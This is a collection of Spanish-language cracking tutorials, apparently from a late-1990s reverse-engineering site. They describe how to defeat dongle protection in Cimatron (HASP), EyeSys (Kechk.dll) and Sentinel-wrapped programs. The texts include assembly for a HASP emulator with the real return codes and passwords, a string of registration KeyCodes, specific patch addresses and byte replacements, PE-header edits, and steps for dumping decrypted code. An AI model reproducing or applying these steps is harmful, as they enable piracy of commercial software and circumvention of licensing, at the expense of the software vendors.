MOV [EDI], EAX (89 07) 

XOR EAX, EAX (33 C0) <--— EAX=0. 

MOV EDI, [ESP+40] (8B 7C 24 40) <-- Codigo de retorno 3. 
MOV [EDI], EAX (89 07) 


POPAD (61) 

RET (C3) // ReadByte(). 

db 16 (memoria emulada). 

XOR EAX, EAX (33 C0) <-- EAX=0. 
MOV EDI, [ESP+38] (8B 7C 24 38). 
MOV [EDI], EAX (89 07). 

MOV EDI, [ESP+3C] (8B 7C 24 3C). 
MOV [EDI], EAX (89 07). 

MOV EDI, [ESP+40] (8B 7C 24 40). 
MOV [EDI], EAX (89 07). 

MOV EDI, [ESP+44] (8B 7C 24 44). 
MOV [EDI], EAX (89 07). 

POPAD (61). 
RET (C3). 


Note que yo he emulado solo 3 servicios aqui (1,2 % 4B), si usted examina el listado del desemsamblador muy de cerca vera 
que muchos otros servicios son referenciados (4, 32, 46, 48, 49 £ 4A), sin embargo el codigo nunca podra ser alcanzado, por 
supuesto con un programa como Cimatron y otros 31 DLL's para desproteger usted podria pensar que el tiempo que toma 
desensamblar cada DLL es inaceptable y entonces emular esos servicios no referenciados tambien. Con el servicio 4B 2 bytes 
son leidos, direcciones C 8 D, estos son entonces XORed con 8000h y deben igualar el ID de su dongle 1.e. un ID 0614 
requiere 8614 => word C = 14 £ word D = 86. Dispare su recientemente emparchado chkddf.exe, bien sabe usted, esto 
funciona :-). 


El DLL principal en Cimatron es cimit.DLL, este ejecuta el programa principal y esta protegido para reflejar eso. En vez de 
simplemente la version 7 de la cubierta, Cimatron ha aplicado la version 6 tambien. En vez de darle con cuchara esta "galleta" 
(cracker), yo solamente describire como lo hice, la aplicacion le queda a usted. En principio la cubierta vó tiene que ser 
localizada, usted puede hacer esto con el usual bpx en FreeEnvironmentStringsA, el programa tambien verifica para el dongle 
de Cimagrafí's entonces busque esos passwords :-). Yo elegi hacer alguna redirecciones aqui, usted puede encontrar el JMP 
HASPDOSDRV bastante facilmente y redirigir el JMP a un CALL a su propia rutina - esto significa que usted debe encontrar 
donde es desencriptado el codigo para ese JMP (facil con bpr). 


La cubierta v7 sin embargo es desencriptada por la cubierta vó lo que significa que usted no puede simplemente pegar su 
emulador al comienzo de la seccion .data, usted tiene que encontrar donde es desencriptada (bpr nuevamente) - le advierto, esto 
probara su paciencia como que hay mucho 'copiar a' y 'copiar desde' para lidiar. Yo no pense que fuera practico trabajar todos 
los bytes desencriptados requeridos para generar mi rutina de emulacion completa (que para cimit.DLL alcanza los 672 bytes), 
por consiguiente desencripte solamente un "JMP long” a otra rutina que puse en el espacio libre al final de .reloc, recuerde que 
no tenemos cuidado actualmente si la cubierta v7 es desencriptada como basura, nosotros nunca vamos a llamar alli. En la 
version distribuida de este crack yo tuve que emular el servicio 3 y realize un trabajo muy torpe modificando las caracteristicas 
del header PE tambien podria escribir un JMP sobre un JNZ (esteticamente desagradable). 


Aquellos de ustedes que usan la opcion RE_ENGE necesitan un numero de registro para poder salvar apropiadamente. Mí buen 
amigo prs emparcho un DLL para ustedes, yo recorri todavia la milla extra y force 00061E21 como un codigo valido. 


Esto es real, no hay cracks terminados hechos para perdedores aqui, vayan y hagan algun trabajo ustedes mismos :-). Si 
cualquiera de Cimatron tiene bastante inquietud como para enviarme un e-mail entonces, quizas, una conversacion civilizada 
pueda estar proxima. 


O Dongles U Return to Main Index 
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Cimatron es un software muy caro y su proteccion parece formidable cuando se la ve por primera vez, nunca ha sido practico 
eliminar el dongle usado mediante emparchado solamente, en vez de eso debemos emular la rutina principal del HASP. El 
programa tambien utiliza varios codigos para habilitar opciones(esto es solamente una llave del registro - el aptly llamado 
KeyCode controla la ejecucion del modulo). Comenzaremos por localizar la marca de fabrica de la rutina HASP (Yo utilizo mi 
propio programa de marca de fabrica para este proposito, pero no es exactamente dificil codificar su propio findhasp.exe :) ). 2 
lugares estan descubiertos, pero donde nos enfocaremos primero es en haspms32.dll. 


Afortunadamente usted puede desensamblar facilmente este archivo y localizar la exportacion del 'hasp', esta es la rutina de 
llamada al dongle que recibe y acciona los codigos de servicio. Me he enfocado en cimit.dll como conteniendo la mayoria de 
los chequeos simplemente porque todos los modulos Cimatron son realmente cargadores (loaders) para cimit.dll. Cimit.dll 
tambien aloja el chequeo del KeyCode que no tratare aqui, aunque sea digno de alguna discusion. Cimit.dll pesa unos 6.6Mb's 
y el desensamblado con el W32Dasm era la unica opcion en mi PC. 


2hrs despues, efectivamente si chequean las funciones importadas encontraran haspms32.hasp (estas son buenas noticias para 
nosotros), el numero de CALL's sin embargo es evidentemente NO TAN grande. Unos 22 chequeos separados, muchos 
servicios diferentes pero todos localizados muy proximos en terminos de direccion. Los listaremos aparte a causa de los 
argumentos, recuerden el formato de los parametros [colocados]. 


Basic 8. servicios Hasp Especificos para el Dongle 


Servicio: Nom./No. No. de parametros retornados Otras direcciones X-ref 

IsHasp() - 1 1 parametro de status (Parl). 1C53E115, 1C53E1C7 

HaspCode () - 2 4 parametros retornados. 1C53E164, 1C53E4FA 

ReadWord() - 3 2 retornos (word + status). 1C53E3E9 

WriteWord() -— 4 1 parametro de status. 1C53E288, 1C53E2F1 

ReadBlock() - 32 1 parametro de status. 1C53E372 

SetTime () 46 1 parametro de status. 1C53E8A4 

GetTime () 47 4 parametros retornados. 1C53E98B 

SetDate () 48 1 parametro de status. 1C53E908 

GetDate() 49 4 parametros retornados. 1C53EA20 

WriteByte() -— 4A 1 parametro de status. 1C53E5E9, 1C53E66F, 1C53E6C6 
1C53EAC7, 1C53EB24. 

ReadByte () 4B 2 retornos (byte + status). 1C53E73C, 1C53E7C1, 1C53E81B 
1C53EB80, 1C53EBDE. 


Todos estos servicios y chequeos parecen desalentadores, 22 chequeos en total, a los diseñadores de Cimatron realmente les 
gusta estar leyendo y escribiendo en el dongle, tambien hacen uso del reloj de tiempo real. Tristemente esta maravillosa 
estructura API tiene una debilidad inherente, los que hacemos ingenieria inversa podemos ver lo que el programa debe 
devolver exactamente, obviamente en el caso del servicio 2 usaremos un generador HASP de UCL's para encontrar los codigos 
de retorno reales (aunque podemos estar en problemas si otras dl!l's llaman a los sevicios con "seeds" diferentes), sin embargo 
todos los parametros lucen bastante faciles de recuperar. Podemos cargar la exportacion haspms32.d1l con el Loader de 
SoftICE, esto sera util para localizar los chequeos iniciales, pero finalmente querremos rastrear el .dll y codificar nuestra rutina 


emuladora alli. 


Hagamos un bpx para hasp(). Nuestro primer break es en la direccion 1C53E4B1 (servicio 1), parece como si el DWORD a ser 
verificado debiera ser no-cero. Despues de modificar este chequeo en memoria el servicio 2 es llamado en 1C53E4FA, aqui 
podemos ver los parametros que deseabamos :), Password 2 es 713D, Password 1 es 2209 y el "seed" code es 64 (el resultado 
de los parametros retornados es este - 3FA1, FF26, 5EE7 8 4955). Los diseñadores de Cimatron sin embargo, evidentemente 
no son estupidos, ellos no verifican solo el codigo de retorno, sino que lo manipulan (aunque unicamente una subtraccion)y 
utilizan el resultado como flags, esto sin embargo no sera un problema cuando "emulemos" estos retornos dentro de la rutina 
principal del hasp(). 


Un bpx final ocurre con una llamada al Servicio 4B, esto devuelve error -28 (El HASP con el password especifico no fue 
encontrado), evidentemente este deberia ser O. Asi que iniciamente podemos ver lo que es necesario hacer, pero luego 
encontraremos solo 3 de los servicios, recuerden que no es dificultoso revertir estos procedimientos de verificacion en cada 
caso, heche una mirada al servicio 2. 


:1C53E4FA CALL hasp() Servicio 2. 


:1C53E4FF MOV ECX, DWORD PTR [1D33D7C8] <-- Codigo de retorno 1 (3FA1) 
:1C53E518 MOV EAX, DWORD PTR [1D33D7CC] <-- Codigo de retorno 2 (FF26). 
:1C53E530 MOV EDX, DWORD PTR [1D33D7D0] <-- Codigo de retorno 3 (5EE7). 
:1C53E549 MOV ECX, DWORD PTR [1D33D7D4] <-- Codigo de retorno 4 (4955) 


Los diseñadores de Cimatron actualmente restan estos valores de otras posiciones de memoria, los resultados deseados deben 
ser siempre 0. Para que funcione el servicio 4B necesitamos el valor del byte de retorno (sabemos que el estado del Par3 debe 
ser 0). Antes de que hagamos todo esto, les dare un KeyCode para el registro. Realmente su valor es echar una mirada a la 
matematicas detras de estos codigos que se validan usando IDIV's firmados. 


"25077193,24980256,22023906,14541172,14488979,6305836,6222823,4336014" 


Retornemos a nuestro emulador HASP . Cuando comenzamos el bpx para hasp() encuentra que se hacen llamadas a los 
servicios 1,2 8 4B (x2). Echemos una mirada dentro de haspms32.d1l (MEMORIZE ESTE PATRON DE CODIGOS). 


:10002E46 CMP BH,32 <-- BH es SIEMPRE el codigo del servicio. 
:10002E50 JB 10002E50 <-- el Handle del servicio basico es levemente diferente. 
:10002E56 CALL 10002C64 <-- Comunicacion con el HASP. 


Despues de la llamada para comunicarse con el HASP nuestros parametros estan listos para se retornados Par1=AX, Par2=BX, 
Par3=CX £ Par4=DX, ahora bien, el objetivo de nuestro emulador es 1) identificar el codigo de servicio, 11) responder de 
acuerdo a el 8 111) emparchar los valores correctos de acuerdo con el servicio. Hacer espacio para nuestra rutina no es 
demasiado dificil (al menos es lo que pense al principio), simplemente podemos escibrir sobre la llamada al hasp() con nuestro 
emulador CALL (CALL es preferible a JMP porque podemos (hacer) RET mas facilmente). 


Nuestro primer problema es evidentemente identificar el servicio, simple realmente, es siempre el valor de BH. Hablemos un 
poco sobre el manejo de los servicios, el servicio 1 no es un problema, donde el servicio 2 podria haber sido mas tramposo es sl 
el "proteccionista" hubiese emitido 2 llamadas al servicio 2 con un codigo "seed" diferente, pienso sin embargo que este no es 
el caso. Para el servicio 3 conocemos CX (Par3) necesitamos que sea O y BX (Par2) deberia ser una palabra del dongle, sin 
embargo no puedo ver como el servicio 3 puede ser llamado, ciertamente la creacion de una pagina del stack en 1C53E3B0 no 
podria ser alcanzada nunca, nosotros lo emularemos solo en caso de que. Los servicios 4/32/4A mostraran ser triviales 
(Par3=0). Miraremos los servicios especificos de Time/Date luego, el service 4B podria darnos un dolor de cabeza si los 
parametros de retorno se verifican o se utilizan como variables. 


Con el servicio 4B estoy contando con un poco de suerte, si usted piensa un poco en terminos de lenguaje de alto nivel, 
comprendera lo dificil que es no traicionar el valor del codigo de retorno esperado (Par2) si usted lo utiliza como variable o 
flag, la necesidad de un manejador de error mostraria eso, obviamente los puntos a considerar son donde cualquier flag podria 
ser chequeado. Mirando cada llamada al servicio 4B, ambos Par2/Par3 siempre parecen ser verificados, pero no estoy seguro 


de si Par2 se usa realmente como alguna otra cosa que un flag indicador, pero eso puede ser verificado usando SoftICE. 
Hagamos un boceto de nuestro codigo de emulacion. 


Incio del Emulador 


:CMP BH,01 <-- Es el servicio 1 (80 FF 01). 

:JNZ proximo_servicio 

¿MOV EAX,00000001 <-- EAX (Parl=1) HASP encontrado. 
:RET <--— Retorno del emulador. 

:CMP BH,02 <-- Es el servicio 2 (80 FF 02). 

:JNZ proximo_servicio 

¿MOV EAX, 00003FA1 <-— Parl 
¿MOV EBX, 0000FF26 <-—- Par2 
¿MOV ECX, 0O0005EE7 <-— Par32 (B9 E7 5E 00 00 
¿MOV EDX, 00004955 <--— Par (BA 55 49 00 00 
:RET <--— Retorno del emulador. 

:CMP BH,03 <--— Es el servicio 3 (80 FF 03). 
:JNZ proximo_servicio 

¿XOR ECX,ECX <-- Limpiar el Par3 (Par3=0). 
:MOV EBX,00000001 <--— Creo que el Par2 deberia ser 1 
:RET 
:CMP BH,04 <-- Es el servicio 4 (80 FF 04). 
:JNZ proximo_servicio ..... 
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No completare esto, usted debe profundizar la idea para los codigos de servicio restantes. Debemos, sin embargo, chequear los 
servicios 46-49, (46 $ 48) ambos probaran ser triviales, simplemente coloque Par3=0 ¡.e. (status good) y estos chequeos 
estaran muertos. Las llamadas a los servicios 47 € 49 sin embargo retornan 4 parametros, Par3 parece ser el unico que 
podemos fijar confiablemente. Como este HASP evidentemente tiene un reloj de tiempo real que no podemos emular 
facilmente, tendremos que descifrar que parametros son chequeados, podemos inferir los resultados del servicio 47 porque el 
servicio 49 deberia ser llamado (sino habria un pequeño punto que lo incluyera). Traslademos todos estos parametros a los 16 
bytes del espacio de direcciones del dongle - nosotros establecimos esto chequeando nuestra primer llamada al hasp() 1 £ 2). 


Parl = 1D33D7C8 (AX) 
Par2 = 1D33D7CC (BX) 
Par3 = 1D33D7D0 (CX) 
Par4= 1D33D7D4 (DX) 


Esta translacion nos muestra que los servicios 47 $2 49 chequean unicamente Par3 (el status). Podemos, por supuesto que solo 
por razones esteticas, emparchar algunos valores de fecha ficticios, aun cuando estos nunca parecen ser verificados. Yo 
emparche todo esto en mi rutina de emulacion, pero ay!, hay un tornillo suelto, hago correr Cimatron y suelta "No Protection 
Device", la razon de esto es un truco realmente solapado de los diseñadores de Cimatron, usted puede encontrarlo en la 
direccion 1C002F40. Una segunda rutina HASP esta incluida dentro de cimit.dll, por consiguiente no llama a nuestro 
maravilloso emulador, de alli el fracaso, hay tambien cuatro referencias cruzadas (X-ref) (afortunadamente para nosotros 
podemos emular la rutina una vez mas, que es exactamente la misma que en haspms32.dll). 


Esta nueva rutina tiene 4 xrefs, 1C30A276, 1C50A2C1, 1C54FC40 8 1C54FC8B. Los servicios 3, 4B, 3 82 4B 
respectivamente, sin embargo los servicios 4B nunca son llamados (son trampas caza-bobos), si el programa esta contento con 
los resultados del servicio 3 entoces usted puede saltarse siempre esos chequeos secundarios. Sin embargo la presencia de esta 
rutina incorporada dentro de un dll es una noticia miserable para nosotros, en primer lugar, debemos buscar por cualquier otra 
ocurrencia y en segundo lugar debemos chequear todos los dll's mayores usados por el programa (aunque cimit.dll haga la 
mayoria del trabajo). La instruccion 'cmp bh, 32' sera un criterio lo suficientemente estrecho para realizar la busqueda, a menos 
que usted tenga su propia utilidad para hacerlo :). 


Como sugeri, otros dll's llaman tambien a nuestro ahora emulado hasp() tambien, catia.dll (22 chequeos), chkcod.dll (20 
chequeos), chkddf.dll (20 chequeos) - necesito continuar?. Pero (y este es un gran pero) todavia hay otro gran tornillo suelto, 
yo agregue mi codigo emulador y espere que todo funcionara, pero el programa se colgo muy poco ceremoniosamente, mi 
primer pensamiento:) (mala codificacion por mi parte), hice bpx al inicio del codigo de emulacion, despues de los primeros 5 
opcodes podia ver alguna clase de corrupcion del codigo operativo, este es el verdadero asunto de los "reverser's", la rutina 
principal hasp() esta protegida de alguna forma contra modificaciones, algo mayor de 5 bytes o asi y alguna rutina patea 
(evidentemente no es un problema con la encripcion porque el archivo esta completamente desencriptado). 


Esta rutina me produjo los mayores dolores de cabeza, salgo ahora de la pedagogia, probe haciendo bpx-ing para las APIs de 
apertura de archivos (BoundsChecker), buscando alguna clase de rutina de CRC/Paridad pero nada aparecio, probe re- 
dirigiendo la llamada a mas alto nivel (seguia corrupto), muchas mas cosas ademas pero todavia no podia emular eficazmente. 
Al final yo aprendi varias cosas, primero, que no importaba donde re-dirigia las llamadas o donde agregaba el codigo, la rutina 
pateaba, sin embargo podia emparchar 5 bytes y evitar la deteccion, esto casi seguramente excluye checksumming y CRC, 
quizas lo que tenemos es un verificador de paridad de orden (?), la solucion puede involucrar agregar codigo al final del 
archivo. 


Agarren ustedes mismos una copia de una utilidad PE Dump,( el Dumppe.exe incluido con el Sourcer es perfectamente 
adecuado). Vuelquen el contenido a un archivo de texto usando una simple re-direccion de salida D.O.S. e.g. 


dumppe haspms32.d11 > dumphasp.txt 


Consideren la siguiente información: 


Tamaño de Imagen : 18000 

Tamaño Virtual : 568 (de la seccion .reloc). 
Offset del Raw Data : 12200 (de .reloc). 

Tamaño del Raw Data : 600 (de .reloc). 
Caracteristicas : 42 00 00 40 


Podemos chequear rapidamente 12200h+600h=18200h o 75.776d (el tamaño del archivo), 600-568=98 bytes de espacio libre 
la seccion .reloc que no es bastante espacio para nuestro emulador. En cambio nosotros alargaremos el archivo (yo elegi 250h), 
entonces podemos agregar esto al Tamaño de Imagen (18250), Tamaño Virtual (818) y Tamaño de Raw Data (850). Para 
realizar estos cambios necesitara editar los header's de los archivos PE (busque por .reloc usando HIEW (HVIEW?) y 
encontrara estos valores en estrecha proximidad). Tambien necesitaremos cambiar la caracteristica de 42 00 00 40 a 42 00 00 
E2 (ver la documentacion de M$ sobre archivos PE para comprender esto). Finalmente con nuestros nuevos valores 
necesitaremos alargar el archivo (12,200h+850h=12A50h) = 76,368 bytes. 


Este cambio nos dara espacio suficiente para iniciar un CALL a nuestro emulador y realizar las acciones necesarias, esto de 
veras trabaja y podemos realizae facilmente un RET al final completando asi el crack ([btw?] el instalador hace una llamada al 
servicio 3 que puede tambien gustarle emular). Si usted quiere echar una mirada a un haspms32.dll emulado, entonces envieme 
un e-mail y le dare la URL. 


Pequeño Addendum - agregado el 08/04/99 


Durante la prueba de este programa llamo mi atencion que aun despues de todo este trabajo Cimatron se cuelga despues de 10 
minutos de uso, esto es porque cimit.exe tambien tiene una rutina hasp() interna independiente del emulador. Los servicios son 
triviales, (4 £ 4A), limpiar Par3 (XOR ECX,ECX - Par3=0) sera suficiente para matar estos chequeos (este seguro de rastrear 
el codigo con un INT 3 bien puesto). 


Revision de la Proteccion 


Yo realmente recomiendo esta proteccion, el numero de chequeos obligara a cualquier cracker serio a emular la rutina 
principal, mis unicas leves criticas son la confianza puesta en el chequeo de Par3 (los regulares de HASP habran tomado nota 
de esto) y la falta de chequeos de los servicios 2 8 3 . De hecho yo pienso que la falta del chequeo del servicio 3 es mas debido 
al hecho de que Cimatron eligio un dongle barato sin demasiada memoria. Esta es una buena proteccion y en mi opinion es 
segura frente a cracker's *normales*, por esta razon elegi no entregar un parche "listo para usar” o mi emulador. 
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TUTORIAL SOBRE EYESYS WINDOWS WORKSTATION 2.11W 


En primer lugar dare las gracias a la persona que me envio este programa para examinarlo. 

EyeSys , por lo que he podido ver es una herramienta util para opticos. 

De hecho sin algun hardware de especialista este software es inutil. 

Como era de esperar de una aplicacion de especialista se ha usado una proteccion del tipo Dongle , 
el programa data de 1994 ( lo que quiere decir que es anterior al Softlce v3.x W32Dsm y posiblemente IDA ). 
Con las herramientas que hay a dia de hoy no deberia haber mucho problema. 

Sin embargo el programa esta en 16-bits y como se vera , implementa una proteccion basica 
Anti-Debugging. No te dare ningun premio por poner un BPX al MessageBox, 

Pero mirando hacia atras vemos que la funcion responsable del chequeo del Dongle 

es importada desde una DLL ( Kecheck.dll ). 

Se podria abrir ww.exe con W32dsm e invertir el salto responsable del MessageBox. 

Pero en vez de eso usaremos el Softlce , un bpio -h 378 rw funcionara pero por mas F-12 que pulses 
no llegaras a donde fue llamado desde la aplicacion , 

recuerda que el objetivo sera parchear la DLL y no el ejecutable. 

Siendo una aplicacion en 16-bits tambien nos traera dolores de cabeza, 

si ponemos demasiados Bpx en un trozo especifico de codigo en modo protegido 

el valor del Segmento de Codigo (CS) es muy importante, bajo 32-bits ¡aparte de circunstancias 
excepcionales podemos asumir CS como una constante. 

Consideremos este trozo de codigo: 

:0010.3206 PUSH BX <-- No se puede poner un Bpx aqui facilmente. 

:0010.3213 CALL KECHK.KECHECK <-- llamada a la DLL responsable. 


El truco evidentemente es el uso de la tecnica de parche temporal de la INT-3 


Nosotros reensamblaremos entonces el " push bx " en tiempo de Debug. 

Alcanzamos este codigo e intentamos tracear KECHEK...problemas, 

" Softlce Break due to embedded INT-3" se repite hasta el infinito. 

No puedes tracearlo, por supuesto,podemos sortearlo facilmente 

considera este truco basico antidebugging como en los dias cuando los crackers usaban 
Turbo Debugger/Softlce para Windows 3.1 

start: 

MOV CX, 0200h <-- CX usado para el loop. 

MOV SI, 0100h <-- SI contador. LODSB <-- cargar Byte. 

INT 3 <-- Stop si cualquier debugger esta activo. 

CBW ADD BX,AX LOOP start <-- y frustrar al cracker volviendo al loop. 

Como ya debes saber , los debuggers insertan una INT-3 (opcode CC) en el codigo del programa, 
que actua como disparador del bpx. En este codigo cualquier debugger saltara 

en cada reiteracion del bucle 2 bucles como este te molestaran bastante en tu tarea. 

Por supuesto Softlce puede facilmente desconectar este mecanismo usando I3HERE. 
Tan pronto como tracees en la llamada a KECHEK desconecta todas las INT-3 con IBHERE OFF. 
Sin embargo esto no sera suficiente. 

:0001.01BC MOV BH,0O <-- Flag. 

:0001.01BE MOV CX,0002 <-Numero de words a copiar de p-mode a r-mode stack. 
:0001.01C1 LES DI, [BP-22] 

:0001.01C4 MOV AX,0301 <-- R-mode (procedimiento con "far return frame") 
:0001.01C7 PUSH WORD PTR [BP-10] 


:0001.01CA PUSH WORD PTR [BP-12] 


:0001.01CD INT 31 <-- Executa esto en SoftlCE y se acabo el juego. 

Cambiaremos esta INT-31 con NOP's, no es muy elegante pero si efectivo. 

Deberias ser capaz de ver que nuestro objetivo es poner en KECHEK los puntos deseados a cero. 
La manera mas simple para ver donde ocurren malos movimientos es en la ventana watch. 
Considera este codigo: 

:0010.3241 CALL KECHK.KECHECK <-- Chequeo Dongle Key. 

:0010.32A6 MOV [BP-0A], AX <-- El valor de AX es importante 

:0010.32AC MOV AX, ES:[BX] <-- Como en [BP-04]. 

:0010.32AF MOV [BP-10],AX <-- guardar ax. 

Tras estos ajustes,los punteros a BP-06/08 8 OA seran comparados con cero 

cualquiera de ellos siendo cero resultaran en un salto bueno. 

Siguiendo el salto , veremos otros 3 chequeos esta vez usando el valor de AX 

y punteros a BP-0C/0E (de nuevo los ceros son deseables) 

Ahora parchearemos ww.exe con una INT-3 justo antes de la llamada final a KECHEK 

(recuerda nopear la int-31 en kechk.dIl) esto es suficiente para tener un cero en los tres chequeos 
a BP-06 sin embargo en BP-0C/0E tenemos FFFF lo cual no deseamos, 

Traceamos KECHEK y vigilamos estos punteros. Pronto veras que esta llamada especifica no es la 
responsable de estos valores (ya estaban a FF antes de empezar) 

Tendremos que obtenerlos antes,como puesdes haber imaginado la primera llamada a KECHEK 
pone BP-0C y la segunda BP-0E el codigo es muy similar y usa el valor de AX 

el cual es actualmente ES:[BX] Hay sin embargo un pequeño problema, 

antes incluso de la llamada a KECHEK , ES:[BX] contiene FFFF asi pues buscaremos 


una instruccion para alterar esto, He echado un vistazo a todas las Subrutinas llamadas por KECHEK 


y no he encontrado nada que pueda servir para desempeñar esta "instruccion magica" 
Esto significa que tendremos que parchear ww.exe despues de todo. 

Sugerencias para el Patch : 

Reemplazar los tres MOV AX,ES:[BX] con 66 33 CO (XOR AX,AX) 

direcciones : 0010.321E , 0010.3265 , 0010.32AC 


Haciendo estos cambios podremos lanzar el programa. 
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Karpoff Spanish Tutor 


Programa: Análisis de técnica de protección 

PROTECCION: Mochilas de tipo Sentinel 

Objetivo: Sacar la envoltura de un archivo encriptado. 

Descripcion: No se ataca un programa en especial. 

Dificultad: Media, Avanzado. 

DOWNLOAD: http: //xxxx 

SA eriacianld IDA, Editor Hexadecimal, Borland Turbo debug, Borland Tdump es 
conveniente. 

CRACKER: Spyder FECHA: 22/01/1998 


CREDITOS 


Cortesía del sitio de Fravia's dedicado a ingeniería inversa 


Este ensayo describe un método para trabajar con protecciones complicadas como las de las mochilas de tipo 
Sentinel usadas en programas de WIN32. 


AL ATAKE 


Introducción 


Esto no es un crack de un producto en especial, es solamente un trabajo que hace probable, algo que parece 
prácticamente improbable. Conozco poco sobre mochilas, o sobre las empresas que las hacen. La que hace ésta es 
llamada Sentinel, y si ves referencias a Sentinel o SSI, es que estamos hablando de lo mismo. Si cuando experimentás 
te encontrás con listados muertos o megabytes de basura, es un buen signo (ojo que también puede ser malo). 


También conozco poco sobre el código actual que se usa para las mochilas; jamas tuve que mirarlo. Poner breakpoints 
en el port de la impresora, o algo parecido, es la peor manera de comenzar a reventar programas protegidos con 
mochilas. 


Ensayo 


¿Por qué este crack se volvió tan difícil? Debido a que el código de las mochilas es un envoltorio para executables semi- 
protegidos. Cuando el envoltorio es aplicado, encripta la mayoría del código ejecutable. De hecho se fija al final del 
programa y se apodera del punto de entrada del programa. Cuando el programa corre, el código de la mochila adquiere 
el control, y si está satisfecho con la mochila, desencripta el ejecutable y le pasa el control a él. El ejecutable, puede 
hacer llamados en varios puntos del programa durante la ejecucion, al código de la mochila para confirmar que aún 
está presente. 


De manera que si crackeás el cádigo inicial de la mochila, aún es necesario entender y emparchar el ejecutable 
principal. El encriptado hace que sea difícil comprender y casi imposible emparcharlo. Crackquear completamente el 
código de la mochila es una opción casi improbable. Estos tipos de mochilas hacen cosas como retornar un valor de un 
string que se le pasa, y el algoritmo y claves que hacen esto, están dentro de la mochila. No hay una manera sencilla 
de emparchar el cádigo del driver de la mochila para tener el mismo resultado. 


No he estudiado con sumo detalle la rutina de encriptación, pero no es débil. Estoy casi seguro que es del tipo "rolling 
encription", donde cambiar un byte afectará todo los siguientes bytes; por esto es que es tan difícil emparcharla. 
También estoy seguro que la clave de encriptado está fuera de la mochila, (debe trabajar de este modo si el que la 
suministra tiene algún sentido). Esto significa que es necesario tener la mochila por algunas horas, aunque a falta de 
mochilas también podés tener algo de suerte. Crackear sin suerte es tan difícil como crackear sin corazonadas. 


Si el programa tiene un modo de DEMO, o tal vez alguna opción para licencias en Red, entonces puede ser 
desencriptada sin la presencia de la mochila, de manera que ésta puede funcionar y después decidir si realmente 
necesita la presencia de la mochila o de una licencia por Red. Bueno, conociendo esto ¿cómo debemos empezar a 
trabajar? Mi enfoque es deshacer lo que se hizo cuando se aplicó la envoltura (wrapper), es decir recrear el programa 
muy cerca de como estaba antes de que fuera envuelto. Podemos aplicar las técnicas normales para estos casos. Abajo 
observamos algunos bits interesantes en tdump para un programa de muestra. 


Entry RVA 0003D950 
Image base 00400000 


Object table: 


$ Name VirtSize RVA PhysSize Phys off Flags 

01. .text 0001£E200 00001000 0001E200 00000400 E0000020 [CERW] 
02  .rdata 00000800 00020000 00000800 0001E600 C0000040 [IRW] 
03  .data 00013E24 00021000 0000D200 0001EE00 C0000040 [IRW] 


04  .PADOOO 00000E00 00035000 00000E00 00000000 C0000080 [URW] 
05  .SSINod 00007A00 00036000 00007A00 0002C000  E0000040 [IERW] 


06 .rsrc 00000800 0003E000 00000800  00033A00 C0000040 [IRW] 
07  .idata 00000Cc00  0003F000  00000C00. 00034200  CO0000040 [IRW] 
08 .reloc 00000200 00040000 00000200. 00034E00 42000040 [IDR] 


SSINod es el código que se agrega para la mochila, PADOOO es donde estaba el segmento original .reloc (contiene 
direcciones importantes que son patcheadas en la carga del programa). Image base es donde se carga el programa 
para el modelo de memoria plano (la mayoría de direcciones son relativas a esta base). Entry RVA es la dirección de 
comienzo del programa. El siguiente paso es cargar el programa en el turbo debug y desencriptarlo. Si el programa 
corre y permanece corriendo mientras presenta un mensaje de error, entonces la mejor manera de proceder es 
disparar el TD32 en una ventana de DOS y unirlo al programa. Esto es una de las maravillas del debug en Win32: sólo 
elegir file | Atttach y seleccionar la ventana, después de un momento TD32 tomará control del programa y vos podrás 
observarlo. 


Podés estar capacitado para iniciar el programa con el TD32, pero tener el control una vez que está corriendo y 
desencriptarlo, no es tan fácil, y menos aún tener la imagen de memoria correcta cuando el programa termine, o tal 
vez fijarte en el Stack para encontrar algunos lugares donde poner BPX de hardware. Estoy seguro que es bastante fácil 
con SICE, pero el SICE, (hasta donde yo conozco), no puede hacer lo que hace el TD32. De cualquier manera asumo 
que de algún modo has maniobrado para tener el control del programa usando el TD32. Para confirmar que el 
programa fue desencriptado, echale un vistazo a la imagen base + .text RVA, y estoy seguro que luce como código. Si 
no, necesitas que algún amigo te preste un mochila, para comenzar todo de nuevo. 


Ahora abrí una ventana para volcar código, ir a (Ctrl-G), dirección de image base y empezá a marcar un bloque 
presionando la tecla izquierda y arrastrá el mouse por los bytes que necesitás (seleccionar bloques con TD32 es un poco 
extraño, algunas veces el shift + el cursor no funciona). Bien, ahora andá al final del segmento .text (el cual debe 
expandir el bloque marcado). Seleccioná Block | Write (Ctrl-B, W) y TD32 cariñosamente volcará el encabezado del 
ejecutable, y el segmento .text estará completamente desencriptado para vos. 


TD32 parace que escribe dichos bloques a una velocidad de 1-2KB por segundos, lo que es bastante lento. Por lo tanto 
te aconsejo que te tomés un café o cocktail como descanso. Perdón si estoy siendo muy específico acerca de la 
operación del TD32, pero la primera vez que trabajé con él, no sabía cómo hacer esto de volcado de bloques de 
memoria al disco, y me pasé muchas horas calcando bloques a un archivo de memoria, después los procesaba con un 
programa que escribí, que hacía que los volcados se convirtieran en el archivo binario. Por eso quiero estar seguro que 
mis lectores conocen estos trucos; "un poco de conocimiento no le hace mal a nadie". 


Ahora una cosa más antes que acabemos con el TD32. Observá el segmento PADOOO. Tiene que tener la mayor parte 
completa de ceros. Tenés que ver un bloque de direcciones de 32 bits. Estas son las direcciones de las entradas de las 
importaciones que fueron emparchadas cuando se cargó el programa en el segmento .reloc, parte del código de la 
mochila las copió aquí, que es donde el programa principal espera que estén. El orden y número de entradas no es el 
mismo que en el segmento .reloc, de manera que no se puede hacer una simple copia de ellas, ni tampoco jugar con 
los RVAs para ponerlas en el lugar correcto. Poné un breakpoint de hardware de escritura de cualquiera de esas 
entradas, y entonces reiniciá el programa desde el TD32 (Ctrl-F2). TD32 debe parar en el medio del código de la 
mochila que copia estas entradas de un lado al otro. 


Echále una mirada al código, y si es como la cosa que yo he visto, encontrarás una tabla de pares de direcciones de 32 
bits apuntadas por EBX. Estas son pares de direcciones relativas, (dentro del segmento .reloc) con la dirección relativa 
para el segmento .PADOOO para el mismo import. Marcá esta tabla y volcála al disco como lo hicimos antes. 


Ahora si terminamos con el TD32, y probablemete con la mochila. 


Juntando las piezas 


Ahora tenemos que insertar el dump desencriptado en el ejecutable, esto es un tipo de edición binaria, pero un poco 
más tramposa. Echále otra mirada a la tabla de objeto tdump y entendé lo que esto significa... 


Entry RVA 0003D950 
Image base 00400000 


Object table: 


$ Name VirtSize RVA PhysSize Phys off Flags 

01. .text 0001£E200 00001000 0001E200 00000400 E0000020 [CERW] 
